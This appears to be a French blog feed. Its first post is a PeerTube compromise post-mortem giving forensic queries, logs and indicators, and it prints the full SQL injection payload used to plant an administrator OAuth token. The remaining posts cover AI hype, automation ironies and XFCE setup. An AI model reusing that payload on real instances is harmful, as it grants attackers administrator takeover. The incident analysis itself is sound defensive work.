Reader

Samedi PeerTube a publié la version v8.1.8, qui prend des mesures complémentaires suite à l'exploitation de la SQLi corrigée en v8.1.6 et la persistence d'au moins un acteur malveillant sur un grand nombre d'instances PeerTube.

D'abord grand merci à Framasoft et Chocobozzz en particulier, pour la communication rapide, claire et transparente.

TL;DR : un acteur malveillant a pu accéder en tant qu'administrateur à notre instance PeerTube. Si vous utilisez l'instance, il est possible que votre identifiant, adresse e-mail et mot-de-passe PeerTube aient été collectés, ainsi que les informations privées de votre profil et compte. Il est indispensable au minimum de renouveler votre mot de passe PeerTube et de le considérer compromis si vous l'employez ailleurs. Ni notre infrastructure, ni nos autres services ne sont compromis d'après notre analyse.

Déroulé et synthèse

• Le 20/12/2018, le commit 2f5c6b2fc6e60502c2a8df4dc9029c1d87ebe30b a introduit une vulnérabilité de type SQLi (injection SQL) dans PeerTube
• Le 18/05/2026, cette vulnérabilité est exploitée par un acteur malveillant non identifié, il obtient un accès administrateur à notre instance et persiste son accès (jeton d'API)
• Le 19/05/2026, l'acteur malveillant teste le bon fonctionnement de son accès
• Le 20/05/2026, le commit cc07364a5d635b6e43a92fc5e2e2e3eeacf4e8f4 et la publication de la version 8.1.6 corrigent cette vulnérabilité upstream
• Le 20/05/2026, l'acteur malveillant teste le bon fonctionnement de son accès
• Le 21/05/2026, nous mettons à jour notre instance PeerTube en version 8.1.6, corrigeant la vulnérabilité mais ne révoquant pas l'accès persistant
• Le 22/05/2026, l'acteur malveillant utilise son accès pour déployer un nouveau plugin sur notre instance PeerTube, lequel ne semble pas opérer d'action malveillante supplémentaire
• Le 23/05/2026, PeerTube annonce avoir détecté une campagne d'intrusion exploitant la SQLi corrigée plus tôt, et publie la version 8.1.8 qui force des mesures de remédiation
• Le 24/05/2026, nous confirmons être victime de la campagne, nous décidons de stopper l'instance PeerTube pour analyser en détails
• Le 25/05/2026, nous estimons que le risque d'intrusion dépassant PeerTube est faible, en accord avec l'analyse publiée par Chocobozzz, et avisons comment communiquer
• Le 26/05/2026, nous communiquons cet article, rétablissons l'instance et déployons les mesures complémentaires

Les composants techniques compromis : notre instance PeerTube a été compromise, un accès persistant administrateur a été déployé et un plugin malveillant a été installé, ainsi que ses dépendances.

L'acteur impliqué : un acteur malveillant ayant opéré la compromission vraisemblable de plusieurs centaines d'instances PeerTube, sans revandication à notre connaissance, et sans divulgation de données personnelles à notre connaisance.

L'impact pour TeDomum : compromission complète de l'instance PeerTube, qui doit être dépolluée avant d'être remise en ligne.

L'impact pour vous : compromission possible de vos informations personnelles (association du nom d'utilisateur, adresse e-mail et mot-de-passe, y-compris potentiellement en clair si vous avez employé PeerTube entre le 18/05/2026 et le 24/05/2026).

Les mesures prises par TeDomum : déploiement des correctifs proposés par PeerTube, analyse complète de l'instance, analyse superficielle du serveur plus largement, révocation de tous les jetons d'authentification et rotation des mots de passe des administrateurices.

Références : – Chocobozzz confirme que toutes les versions antérieures sont vulnérables : https://github.com/Chocobozzz/PeerTube/issues/7622 – La brève discussion associée sur le forum CHATONs : https://forum.chatons.org/t/failles-sur-peertube/8522/2 – L'analyse publique d'une autre instance PeerTube : https://www.sarahgebauer.com/post/peertube-vulnerability-notes/

Scénario documenté

Dans le commit cc07364a5d635b6e43a92fc5e2e2e3eeacf4e8f4, Chocobozzz corrige deux fonctions possiblement vulnérables à une injection SQL. D'après le Changelog, le codepath de updateScore semble être celui exploitable.

Le code en question avait été introduit au début du projet en 2018 dans le commit https://github.com/Chocobozzz/PeerTube/commit/2f5c6b2fc6e60502c2a8df4dc9029c1d87ebe30b.

Le scénario décrit dans les release notes de la v8.1.8 aurait consisté à présenter une URL d'inbox exploitant l'injection SQL, pour exécuter d'autres instructions dans la transaction SQL, comme l'insertion d'un jeton OAuth d'API avec accès administrateur. Le jeton aurait ensuite été employé via l'API pour installer un plugin malveillant nommé peertube-plugin-google-analytics-js.

Le code du plugin analysé impliquerait le chargement d'une ressource JS externe. Il est difficile de qualifier son comportement : la version servie pendant l'analyse se contentait d'afficher un log dans la console navigateur mais d'autres versions ont pu être servies en fonction du client.

Outre la suppression du plugin des dépôts de PeerTube, le correctif additionnel de la v8.1.8 consiste à :

1. désactiver automatiquement le plugin
2. logout tous les OAuth pour forcer un nouveau login
3. ajouter une option pour empêcher l'utilisation de l'API en tant que compte administrateur

Confirmation de l'exploitation

Sommes-nous concernés ? oui (requête fournie dans les release notes PeerTube, recherche l'IP de l'acteur malveillant connu).

# SELECT * FROM "actorFollow" WHERE "url" LIKE '%20.240.202.159%';
-[ RECORD 1 ]-+----------------------------------------------------------------------
id            | 4739
state         | accepted
score         | 1000
actorId       | 1152554
targetActorId | 2
createdAt     | 2026-05-18 18:47:48.222+00
updatedAt     | 2026-05-18 18:47:48.222+00
url           | http://20.240.202.159:8777/users/audit<snip>/follows/<snip>

L'insertion de l'acteur donc le début de l'intrusion date du 18/05/2026, il y a une semaine. Nous n'avons donc plus beaucoup de logs ou métriques utiles à exploiter.

L'adversaire a-t-il tenté une exploitation ? oui (requête fournie dans les release notes PeerTube, recherche le pattern permettant l'exploitation SQLi par l'acteur malveillant identifié).

# SELECT count(*) FROM "actor" WHERE "inboxUrl" LIKE '%''%';

id                | 1152554
type              | Person
preferredUsername | audit<snip>
url               | http://20.240.202.159:8777/users/audit<snip>
followersCount    | 0
followingCount    | 1
inboxUrl          | http://20.240.202.159:8777/x');DO/**/$f$/**/DECLARE/**/uid/**/INT;/**/cid/**/INT;/**/BEGIN
/**/EXECUTE/**/'SELECT/**/id/**/FROM/**/'||quote_ident('user')||'/**/WHERE/**/role=0/**/LIMIT/**/1'/**/INTO/**
/uid;/**/EXECUTE/**/'SELECT/**/id/**/FROM/**/'||quote_ident('oAuthClient')||'/**/LIMIT/**/1'/**/INTO/**/cid;/*
*/EXECUTE/**/'INSERT/**/INTO/**/'||quote_ident('oAuthToken')||'('||quote_ident('accessToken')||','||quote_iden
t('refreshToken')||','||quote_ident('accessTokenExpiresAt')||','||quote_ident('refreshTokenExpiresAt')||','||q
uote_ident('userId')||','||quote_ident('oAuthClientId')||','||quote_ident('createdAt')||','||quote_ident('upda
tedAt')||')/**/VALUES('||quote_literal('pt_audit_<snip>')||','||quote_literal('refresh_pt_audit_<snip>')||','||quote_literal('2030-01-01')||','||quote_literal('2030-01-01')||','||uid||','||cid||',NOW(),NOW())
';/**/END/**/$f$;--                                                                                           
outboxUrl         | http://20.240.202.159:8777/users/audit<snip>/outbox
sharedInboxUrl    |
followersUrl      | http://20.240.202.159:8777/users/audit<snip>/followers
followingUrl      | http://20.240.202.159:8777/users/audit<snip>/following 
serverId          | 5750
createdAt         | 2026-05-18 18:47:48.203+00
updatedAt         | 2026-05-18 18:47:48.228+00                                                                                       

L'URL d'inbox utilisée pour l'exploitation suit effectivement le scénario décrit dans les release notes (insertion d'un nouveau jeton OAuth pour le compte administrateur).

Au moins un token a effectivement été créé pour le compte admin à 19h08 lorsque la fonction vulnérable est exécutée sur l'acteur.

# SELECT * FROM "oAuthToken" WHERE "lastActivityIP" = '20.240.202.159';
-[ RECORD 1 ]---------+------------------------------
id                    | 10501
accessToken           | pt_audit_<snip>
accessTokenExpiresAt  | 2030-01-01 00:00:00+00
refreshToken          | refresh_pt_audit_<snip>
refreshTokenExpiresAt | 2030-01-01 00:00:00+00
userId                | 490
oAuthClientId         | 1
createdAt             | 2026-05-18 19:08:04.716427+00
updatedAt             | 2026-05-22 21:03:43.054+00
authName              | 
loginDevice           | 
loginIP               | 
lastActivityDevice    | curl/8.5.0
lastActivityIP        | 20.240.202.159
loginDate             | 
lastActivityDate      | 2026-05-22 21:02:52.293+00

Approfondissement du scénario

Le scénario décrit est celui qui a été observé à l'échelle par Framasoft et l'équipe de PeerTube. Ce n'est toutefois pas la seule variante que nous souhaitons considérer.

Première variante envisagée : la distribution via le plugin malveillant d'un JavaScript conditionné par le client (son IP ou son User-Agent) en vue de compromettre son accès à PeerTube ou son navigateur. Le gain pour l'adversaire serait toutefois marginal car il dispose déjà d'un accès administrateur. On néglige donc ce scénario, supposant que le plugin a pu servir à collecter des métadonnées sur les visiteurices, sans pour autant augmenter la surface compromise.

Autre variante : l'acteur malveillant ou un autre acteur au cours des derniers mois a pu exploiter la vulnérabilité, obtenir un accès shell, profiter des vulnérabilités Linux en cours pour élever ses privilèges sur notre serveur et effacer ses traces. Vu la durée de conservation de nos logs et le possible effacement volontaire, il est impossible d'écarter complètement cette variante. On cherche toutefois à identifier des points de contrôle pour se rassurer sur le réel niveau de compromission.

Pour réaliser un tel scénario, il aurait fallu :

1. exploiter la SQLi pour obtenir tout accès à PeerTube, par exemple à l'API comme dans le scénario documenté
2. employer l'accès à PeerTube pour rebondir et obtenir un accès shell, dans notre cas au sein du conteneur Docker qui exécute PeerTube, ou dans un autre conteneur accédé par PeerTube (base de données, cache Redis, les workers pourraient être concernés mais nous n'en avons pas déployé)
3. exploiter l'une des récentes vulnérabilités permettant l'élévation de privilèges sous Linux, par exemple DirtyFrag dont le correctif n'est pas encore déployé sur le serveur qui héberge PeerTube.

Le 1 est acquis, on s'attend à inspecter différents logs et tables de PeerTube pour détecter des indicateurs. Le 3 est trivial une fois le 2 obtenu, on se prépare à rechercher les indicateurs habituels de LPE, et ceux spécifiques aux vulnérabilités récentes.

Le 2 est plus intéressant : a. la configuration de notre serveur PostgreSQL ne permet pas à un PeerTube compromis d'y exécuter du code b. la configuration de notre serveur Redis ne permet pas à un PeerTube compromis d'y exécuter du code c. l'API de PeerTube permet d'installer des plugins, qui pourraient exécuter du code arbitraire et malveillant bien que ce ne fut pas le cas dans le plugin détecté par Framasoft d. l'API de PeerTube et l'accès à la base de données permettent de gérer des tâches, notamment de transcodage, qui font appel à des outils en ligne de commande et pourraient offrir un shell e. l'API de PeerTube permet de mettre à jour la configuration de l'application, ce qui pourrait mener à un accès shell.

Une revue de la structure de la configuration telle qu'elle est mise à jour via l'API ne révèle aucun paramètre susceptible de fournir un shell, éliminant le scénario 2e. Une revue des API de gestion de tâches ne révèle pas d'opportunité d'exécuter du code arbitraire même avec un accès administrateur, éliminant le scénario 2d.

Le 2c peut-être joué en installant un plugin maîtrisé par l'acteur malveillant. La principale contrainte s'imposant pour les plugins PeerTube installés depuis NPM est une règle de nommage : le nom du plugin doit débuter par peertube-plugin- ou peertube-theme. Un plugin malveillant installable via l'API devrait donc être publié sur NPM et nommé en respectant la convention, c'est facile à rechercher sur NPM et dans les logs techniques de PeerTube.

Indicateurs de l'étape 1

On a établi en début d'analyse qu'une injection avait été réussie et avait permis la création d'un jeton administrateur le 18/05/2026 à 19h08, observé en BDD.

On dispose d'une copie de la base de données, telle que sauvegardée le 20/05/2026 et les modifications individuelles (log de transactions) depuis. Ces données nous permettent de confirmer que le compte était bien présent dès le 20/05/2026, que la configuration n'a pas été éditée, et que seul un plugin a été activé en BDD après le 20/05/2026.

Aucune autre activité suspecte n'a été identifiée dans le trafic SQL. On exclut donc une nouvelle exploitation de la SQLi et/ou nettoyage des traces en BDD depuis le 20/05/2026.

On dispose d'une copie des logs techniques depuis le 18/05/2026 à 20h, mais aucun log antérieur en raison de la politique de conservation. Le compte créé par exploitation de la vulnérabilité est antérieur de quelques minutes et nous n'avons donc pas pu observer le log de création. Ce compte génère des logs les 18, 19 et 20 : le 18 lié à un post émis par l'instance malveillante, le 19 et le 20 pour vérifier la validité du token créé.

peertube165.log:{"tags":["http"],"level":"info","message":"20.240.202.159 - - [18/May/2026:21:44:42 +0000] \"POST /inbox HTTP/1.1\" 403 109 \"-\" \"curl/8.5.0\"","label":"video.tedomum.net:443","timestamp":"2026-05-18T21:44:42.332Z"}
peertube171.log:{"tags":["http"],"level":"info","message":"20.240.202.159 - - [19/May/2026:15:54:04 +0000] \"GET /api/v1/users/me HTTP/1.1\" 200 5506 \"-\" \"curl/8.5.0\"","label":"video.tedomum.net:443","timestamp":"2026-05-19T15:54:04.293Z"}
peertube177.log:{"tags":["http"],"level":"info","message":"20.240.202.159 - - [20/May/2026:14:52:00 +0000] \"GET /api/v1/users/me HTTP/1.1\" 200 5506 \"-\" \"curl/8.5.0\"","label":"video.tedomum.net:443","timestamp":"2026-05-20T14:52:00.936Z"}

Pour écarter la piste d'autres exploitations par le même acteur, on teste : – l'occurrence de l'adresse IP dans les logs et en BDD, sans nouveau résultat ; – l'occurrence du user agent dans les logs et en BDD, sans nouveau résultat pertinent ; – l'occurrence d'appels notables et réguliers aux mêmes APIs, sans résultat.

Pour détecter des tentatives d'autres acteurs malveillants, on recherche d'abord les acteurs ActivityPub dont l'URL d'inbox est anormalement longue plutôt que la présence spécifique d'un simple quote : aucun nouveau résultat.

# SELECT id, type, "preferredUsername", "inboxUrl" FROM "actor" WHERE length("inboxUrl") > 100 LIMIT 20;

Afin d'écarter l'hypothèse d'un nettoyage de la BDD après une intrusion, on s'assure que les identifiants des serveurs fédérés avec notre instance sont bien consécutifs (pas de trous).

peertube=# SELECT x.n from generate_series(5000, 5752) as x(n) WHERE x.n NOT IN (SELECT "id" from "server");
 n 
---
(0 rows)

Aucun serveur n'a été supprimé de la fédération, et on peut vérifier manuellement tous les serveurs découverts récemment.

#  SELECT * FROM server WHERE <insérer critères> ORDER BY "createdAt" DESC LIMIT 200;

Seul 2 serveurs sont identifiés : le serveur malveillant connu et un serveur légitime après vérification manuelle.

A ce stade de l'analyse, on estime qu'un unique acteur malveillant a exploité correctement la SQLi le 18/05/2026 : celui déjà étudié par Framasoft.

Indicateurs de l'étape 2

On se concentre sur l'utilisation de plugins PeerTube pour accéder à un shell plutôt que le plugin en apparence inoffensif décrit dans les release notes.

Seuls 2 plugins installés depuis le début de l'année sont référencés en BDD, dont 1 connu et installé par un administrateur :

# SELECT id, name, enabled, homepage, "createdAt" FROM "plugin" WHERE "createdAt" > timestamp '2026-01-01';

-[ RECORD 1 ]
id        | 61
name      | subtitle-editor
enabled   | t
homepage  | https://codeberg.org/herover/peertube-plugin-subtitle-editor
createdAt | 2026-02-26 20:30:33.082+00
-[ RECORD 2 ]
id        | 62
name      | google-analytics-js
enabled   | t
homepage  | https://example.invalid/peertube-plugin-google-analytics-js
createdAt | 2026-05-22 21:02:52.105+00

Comme décrit plus haut, pour être installable par un acteur malveillant, un plugin doit être diffusé sur NPM, avec un nom débutant par peertube-plugin- ou peertube-theme-. 253 packages NPM répondent aujourd'hui à ces critères :

> const names = require("all-the-package-names")
> names.filter(name => name.startsWith("peertube-plugin-")).length
192
> names.filter(name => name.startsWith("peertube-theme-")).length
61

On profite de l'excellent all-the-package-names pour comparer entre deux dates et ne s'intéresser qu'aux plugins publiés depuis le début d'année :

peertube-plugin-emailwhitelist
peertube-plugin-embed-error-events
peertube-plugin-google-analytics-js
peertube-plugin-hcaptcha-plusre
peertube-plugin-lunacode-vaapi
peertube-plugin-odysee-player
peertube-plugin-playlist-page-embed
peertube-plugin-premium-channels
peertube-plugin-premium-members
peertube-plugin-rce-proof
peertube-plugin-sell-storage
peertube-plugin-sidebar-transcript
peertube-plugin-sponsorblock
peertube-plugin-static-review
peertube-plugin-ultimate-transcoding
peertube-plugin-user-group-privacy-enhanced
peertube-plugin-vast-loop-ads
peertube-theme-dracula
peertube-theme-lunacode-98

Parmi les packages actifs dans le node_modules du déploiement PeerTube, seul celui déjà analysé par Framasoft est effectivement présent :

# ls node_modules/ | grep peertube-
peertube-plugin-google-analytics-js
peertube-plugin-subtitle-editor
<snip>

Le plugin en question est publié sur NPM pour la première fois le 22/05/2026. Il ne présente qu'une version dont le nombre de téléchargements (1399 le 25/06/2026) fournit une idée de l'ampleur de l'exploitation : https://www.npmjs.com/package/peertube-plugin-google-analytics-js?activeTab=versions.

L'installation sur notre instance date effectivement du 22/05/2026 à 21h02, soit 15 minutes après la publication, probablement par un automate :

# ls -lahd node_modules/peertube-plugin-google-analytics-js/
drwxr-xr-x 3 systemd-coredump systemd-coredump 4.0K May 22 21:02 node_modules/peertube-plugin-google-analytics-js/

La version installée sur notre instance est conforme à celle distribuée sur NPM. Le plugin ne déclare pas de dépendance qui aurait pu masquer du code malveillant.

{
  "name": "peertube-plugin-google-analytics-js",
  "version": "0.0.1",
  "description": "Inject Google Analytics tracking script into every PeerTube page.",
  "engine": {
    "peertube": ">=8.0.0"
  },
  "keywords": [
    "peertube",
    "plugin",
    "analytics",
    "google-analytics",
    "gtag"
  ],
  "homepage": "https://example.invalid/peertube-plugin-google-analytics-js",
  "bugs": "https://example.invalid/peertube-plugin-google-analytics-js/issues",
  "author": "",
  "license": "MIT",
  "library": "./main.js",
  "staticDirs": {},
  "css": [],
  "clientScripts": [
    {
      "script": "client/common-client-plugin.js",
      "scopes": [
        "common"
      ]
    }
  ],
  "translations": {},
  "private": false
}

Notre analyse est conforme à celle de Framasoft. Il a pu contribuer à la collecte des données concernant les navigateurs d'utilisateurices de notre instance, comme toute ressource JavaScript externe. Il n'a vraisemblablement pas offert à l'acteur malveillant d'accès supplémentaire à l'instance PeerTube ou à nos serveurs.

Indicateurs de l'étape 3

On estime à ce stade qu'il est improbable que l'acteur malveillant ait eu un accès shell permettant une élévation de privilèges. On se contente donc du minimum en terme de vérifications :

• lister les processus toujours actifs, créés depuis le 18/05
• lister les fichiers modifiés depuis le 18/05
• rechercher des erreurs indicatrices dans les journaux système

Aucune de ces vérification n'a relevé d'élément suspect.

La pétition Pour une Convention citoyenne sur l'Intelligence Artificielle circule pas mal en ce moment. Je ne la signerai pas.

J'aimerais vraiment beaucoup qu'il y ait une convention citoyenne sur le déploiement des IAg à marche forcée, mais la pétition telle qu'elle est me semble aborder la question sous un angle très problématique.

Je pense que le problème n'est vraiment pas le risque d'IA générale, la fameuse “superintelligence”. Et qu'agiter cet épouvantail est un bon moyen de masquer les dégâts bien réels à raz de terre, ici et maintenant. Par exemple la loi de simplification de l'état qui classe les datacenters dans les infrastructures stratégiques (et du coup on ne demande plus l'avis de personne). Data for Good a fait une bonne analyse de cette histoire : https://www.linkedin.com/posts/dataforgood_loi-simplification-de-la-vie-economique-activity-7451879853995397120-IATT

Le déploiement des datacenters en France semble juste incompatible avec la stratégie nationale bas carbone : https://www.lesechos.fr/idees-debats/cercle/explosion-de-lia-la-france-devra-arbitrer-entre-alimenter-ses-data-centers-et-decarboner-ses-transports-et-son-chauffage-2222020

Par ailleurs, faire peur sur l'IA générale et la superintelligence est une stratégie délibérée des vendeurs d'IAg. C'est très bien analysé dans le livre “Les prophètes de l'IA” de Thibaut Prévost, ou dans ses chroniques sur Arrêt sur Images/ Il dit en particulier : “Cette double Apocalypse – l'IA nous sauvera toustes/ l'IA nous détruira toustes – et ses multiples déclinaisons impliquent et entretiennent la même certitude techno-déterministe : celle de l'émergence inévitable de l'IAG, de la même manière que les récits du Paradis et de l'Enfer légitiment chacun l'existence de Dieu. En d'autres termes, tous ces types croient, dur comme fer, à la possibilité et l'imminence d'une machine pensante à la puissance divine.”

Voir aussi un texte d'il y a 3 ans, dû à Emily Bender. Il y avait eu une lettre du FutureOfLife Institute demandant une pause sur l'IA, avec des arguments du même genre que la pétition ci-dessous.

Ursula von der Leyen a eu droit récemment à une lettre de scientifiques du domaine quand elle a fait mine de croire que les machines à faire des phrases allaient atteindre le niveau de l'intelligence humaine : https://www.iccl.ie/wp-content/uploads/2025/11/20251110_Scientists-letter-to-the-President-AI-Hype.pdf

Le phénomène de “hype” est un risque politique en soi : https://www.techpolicy.press/expanding-hype-literacy-to-protect-democracy/ On y lit :

“In a historical context where tech leaders are openly embracing neo-reactionary (and intellectually shallow, ill-informed) positions such as the dark enlightenment and effective accelerationism, assessing hype is critical. Especially when the myth of Artificial General Intelligence (AGI) —a sociotechnical fiction itself, since it has been repeatedly considered unachievable through Large Language Models — has amassed the largest private capital investment round in history. The cocktail of deep pocket actors embracing both unrealistic visions and extreme political positions make hype a strategy to make imagination come true — and therefore an urgent matter of political attention.”

Bref, je pense que propager le discours sur l'avènement de la superintelligence, c'est servir les idées de gens tout à fait politiquement infréquentables (voir les explications sur la mouvance TESCREAL). Alors qu'il y a énormément de choses à dire sur le déploiement à marche forcée partout, mais avec des arguments tout à fait terre à terre. Voir par exemple le collectif “Le nuage était sous nos pieds” ou Stop Dataone.

#resistIAGen

Wilkins & Co. Factory – 1860s – Chase & Bachrach (American, founded about 1865, dissolved 1868)

Ironies of Automation

En 1983 Lisanne Bainbridge publia dans une revue d'automatique un article intitulé Ironies of Automation, ce que l'on peut traduire par : les contradictions (ironiques) de l'automatisation. Elle y développe l'idée que, plus un processus est automatisé, plus il doit être surveillé par un être humain compétent, alors même que cet humain perd sa compétence du fait de ne plus exercer le travail que réalise maintenant le système automatique. Toute ressemblance avec les promesses d'une certaine technologie à la mode ces temps-ci serait totalement fortuite.

Dans un article de 2012 intitulé The ironies of automation: still going strong at 30?, les auteurs terminent leur résumé par ce constat tout à fait d'actualité : “The more we depend on technology and push it to its limits, the more we need highly-skilled, well-trained, well-practised people to make systems resilient, acting as the last line of defence against the failures that will inevitably occur.” (Plus nous dépendons de la technologie et approchons de ses limites, plus nous avons besoin de personnes douées, bien formées et expérimentées pour faire en sorte que les systèmes soient résilients, comme dernière ligne de défense contre les pannes qui ne peuvent manquer de se produire – je traduis).

Sûreté des systèmes automatisés

En lisant l'article de L. Bainbridge 43 ans plus tard, on ne peut s'empêcher de penser que, pourtant, des processus industriels ont été automatisés complètement, qui plus est grâce au numérique. C'est le domaine des systèmes embarqués critiques, auxquels on pense relativement peu parce qu'ils fonctionnent vraiment très bien. Par exemple : le freinage automatique dans les métros, même avec conducteur ; la surveillance du cœur des centrales nucléaires qui peut déclencher un arrêt d'urgence ; les commandes de vol d'un avion de ligne ; etc. En revanche certaines promesses qu'on entendait dans les années 2000, comme celle de supprimer la colonne de direction dans les voitures (le drive-by-wire par analogie avec le fly-by-wire), n'ont jamais été réalisées, sans doute car considérées comme trop risquées.

Comment la sûreté de ces systèmes automatisés est-elle assurée ? Une partie de la réponse se trouve dans les principes de conception technique, l'autre dans le cadre de développement de ces systèmes. Côté technique, c'est le règne de la redondance, du déterminisme et de la reproductibilité. Côté cadre, la sûreté des produits repose sur des cycles de développement dédiés, de la traçabilité, des audits indépendants, une attention particulière à la maintenance, une certaine lenteur du processus complet par rapport à d'autres domaines de l'informatique. Dans l'avionique civile la norme DO-178B précise les contraintes de développement des systèmes informatiques selon une classification en cinq niveaux de criticité.

On peut se demander s'il reste un humain “dans la boucle” ? Il est clair que l'humain n'est plus dans les boucles de contrôle qui sont bien trop rapides. Pour certaines boucles le cycle complet (acquisition d'une information sur l'environnement via les capteurs, calculs, production d'une commande vers l'environnement via les actionneurs) peut ne durer que quelques centaines de millisecondes, voire moins. Quand on a décidé d'automatiser les commandes de vol d'un avion de ligne, sachant que le pilote ne pourrait pas se substituer à tous les systèmes automatiques en prenant la place de l'ordinateur “dans la boucle”, la sûreté a été assurée par les choix techniques particuliers et les contraintes qui encadrent le processus de développement. Les pilotes sont formés à la cohabitation avec des systèmes automatisés, pour reprendre la main sur certaines fonctions si le système automatique se désengage, par exemple à la suite de données capteurs non fiables.

Dès qu'on relâche un peu les contraintes sur le cadre de développement, les exigences de certification et la formation des pilotes, cela peut déboucher sur des accidents du type Boeing 737MAX. Et finalement, même si le cadre contraint est respecté, il peut subsister des accidents, malgré tout. Pour certains il semblerait que les contradictions de l'automatisation, comme définies par L. Bainbridge, se soient manifestées. On peut penser au cas du vol Rio-Paris. L'émotion qu'ils suscitent est à la hauteur du degré de confiance qu'on a acquis dans ces systèmes.

Quoi qu'il en soit, personne n'a jamais suggéré d'assurer la sûreté du système automatique de commandes de vol en développant un robot-pilote installé à la place du pilote, lui-même surveillé par un humain. La sûreté du système automatisé est assurée par : des choix techniques, un cadre de développement, la formation des humains amenés à intervenir. C'est en quelque sorte une automatisation de premier ordre. Si les solutions techniques impliquent la redondance entre un système principal et un autre système qui le surveille, c'est d'une certaine manière une surveillance horizontale.

Propositions de l'agentisation : on passe à l'ordre supérieur

Quand on utilise un LLM pour produire du code, il est conseillé de relire et contrôler cette production. C'est un travail pénible, qui demande des compétences que l'être humain va justement perdre en ne pratiquant plus la production de code. Les contradictions (ironiques) de l'automatisation sont de retour. Est-ce que les promoteurs de ces “outils” envisagent d'assurer la qualité du logiciel final grâce à la redondance et à la lenteur, voire la lourdeur, des cadres de développement ?

Force est de constater que les propositions de l'agentisation ressemblent à s'y méprendre à l'idée de développer un robot-pilote installé à la place du pilote, lui-même surveillé par un humain. Quand on signale que surveiller la production de code d'une machine est pénible et risque de ne pas pouvoir assurer la qualité, la réponse est toujours orientée vers plus d'automatisation : des revues de code automatiques, des tests automatiques, un agent IA qui inspecte le travail d'un autre agent IA, etc. Tout cela surveillé par un humain, bien sûr. Lequel est de plus en plus loin de l'activité réelle qu'il pratiquait auparavant et dont il tirait les compétences qui lui sont maintenant d'autant plus indispensables qu'il doit surveiller une armée d'agents infatigables. L'humain “dans la boucle” n'est plus censé surveiller seulement un robot-pilote, mais bientôt les robots-pilotes de toute la flotte d'une compagnie. On passe à une automatisation d'ordre supérieur. Nul doute que les contradictions de l'automatisation passent elles-mêmes au niveau supérieur. Pourtant dès 2020, les auteurices de Closing the AI accountability gap: defining an end-to-end framework for internal algorithmic auditing mentionnaient l'avionique comme source d'inspiration pour une démarche d'audit de bout en bout des systèmes d'IA.

Tout ça ressemble de plus en plus à une autre ironie, celle de cette “information” due à Onion News Network : la sortie d'une nouvelle version du jeu World of Warcraft (WoW), intitulée World of World of Warcraft. Le joueur anime un personnage qui lui-même joue au jeu WoW d'origine. Les personnes interviewées sont unanimes et enthousiastes sur le réalisme du jeu ! On les entend dire : – Here I'm gonna press Alt-Shift-7 and that's gonna make my character start scrolling through the terms-of-use agreement, and user-licence agreement (ça a l'air vraiment amusant !) – I'm gonna press my up-arrow key, and that's gonna make him press his up-arrow key, which just gonna make the character on his screen move forward across the screen – When you're staring at a computer screen, you actually believe you're in a basement staring at a computer screen, with each keystroke you just think “Oh my god! It sounds exactly like keystrokes that I know from my own personal experience of hitting keys”.

Vraiment, redisons-le, toute ressemblance avec les promesses d'une certaine technologie à la mode ces temps-ci serait totalement fortuite.

#resistIAGen

Après des années d'utilisation de Gnome et de Cinnamon, je suis revenu sur XFCE (sous Linux Mint). J'en ai profité pour noter les actions à réaliser pour aboutir à un système qui me plaise en termes d'usage et d'interface, et que je reproduirais si je devais réinstaller XFCE demain.

1. Mieux utiliser la touche Super avec xcape

J'ai pris l'habitude d'utiliser la touche Super pour plusieurs trucs :

• en combinaison avec les touches fléchées, pour déplacer la fenêtre en cours sur une moité de l'écran ;
• en combinaison avec v, pour ouvrir la popup du gestionnaire de presse-papier et coller du contenu depuis l'historique (j'y reviens plus bas) ;
• en appui simple, pour ouvrir le menu principal (commande xfce4-popup-whiskermenu) et lancer un logiciel ou une commande.

Le problème est qu'assigner la touche Super à l'exécution de xfce4-popup-whiskermenu empêche les autres utilisations de cette touche.

La solution consiste :

1. à installer le paquet xcape ;
2. à attribuer à la commande xfce4-popup-whiskermenu un autre raccourci, comme Alt + F2 ;
3. à exécuter la commande xcape -e 'Super_L=Alt_L|F2' au démarrage de la session.

Ce faisant, l'ensemble des usages présentés ci-dessus sont désormais rendus possibles, xcape attendant que la touche Super soit relâchée pour exécuter le raccourci associé.

2. Utiliser clipman pour manipuler le presse-papier

Je trouve cela très pratique de pouvoir copier une série de contenus pour les coller ensuite les uns après les autres. Cela évite d'avoir à jouer au ping pong avec différentes fenêtres.

Si j'utilisais diodon précédemment, j'ai préféré employer l'outil maison de XFCE, qui remplit tout à fait ce besoin. J'ai d'abord dû l'installer : sudo apt install xfce4-clipman xfce4-clipman-plugin

J'assigne ensuite le raccourci Super + v à la commande xfce4-clipman-history. Dernier point : s'assurer que clipman est bien configuré. Dans ses propriétés, le réglage Coller instantanément est fixé sur Ctrl + v (au lieu de Aucun par défaut).

3. Accéder au terminal en “drop-down”

Pour accéder rapidement au terminal sans avoir une fenêtre ouverte en permanence, j'utilise l'option --drop-down du terminal de XFCE. Ainsi, le raccourci Ctrl + Alt + t exécute xfce4-terminal --drop-down.

4. Accéder à des emplacements distants avec webdav et Thunar

Mon client Nexcloud est configuré pour utiliser 2 instances, une professionnelle et une personnelle, mais je ne synchronise pas l'entièreté de celles-ci par manque de place sur le disque. L'accès webdav représente donc le meilleur moyen de lire ou d'éditer facilement des fichiers non synchronisés.

Avec l'explorateur de fichiers Thunar, il suffit de renseigner le chemin d'accès en le précédant de davs:// ; ne pas oublier de l'ajouter aux favoris pour le retrouver rapidement après un redémarrage de la session.

5. Rendre plus sobre le tableau de bord et harmoniser la taille des icônes

Je trouve l'apparence du tableau de bord un peu petite et bordélique par défaut. Les réglages que j'ai appliqués :

• Onglet Affichage des préférences du tableau de bord : pousser la taille de la ligne à 48 pixels ;
• Dans l'onglet Apparence : décocher Ajuster la taille automatiquement et fixer la taille des icônes à 32 pixels ;
• Puis dans l'onglet Éléments, pour Boutons des fenêtres :
  • je décoche Afficher le nom des boutons pour gagner beaucoup de largeur ;
  • je coche Grouper les fenêtres par application
• Pour Greffon de la barre d'état, je désactive la taille automatique et fixe la taille des icônes à 32 pixels. Je coche Éléments carrés ;
• Enfin, dans Greffon d'état XApp, je fixe également la taille des icônes à 32 px.

6. Paramétrer les Actions de recherche du menu Whisker

Les actions de recherche permettent d'utiliser un mot clé pour exécuter une recherche ou une commande depuis le menu Whisker. Comme celui-ci est appelé par la touche Super, ça permet d'atteindre très rapidement et facilement ce qu'on recherche.

Par défaut, certaines actions sont déjà configurées : # permet de rechercher dans les pages de manuel ; ? permet de rechercher sur le web avec Duckduckgo, etc. À noter qu'il n'y a pas besoin d'insérer une espace : ?Pierre Bourdieu lance une recherche sur l'éminent sociologue.

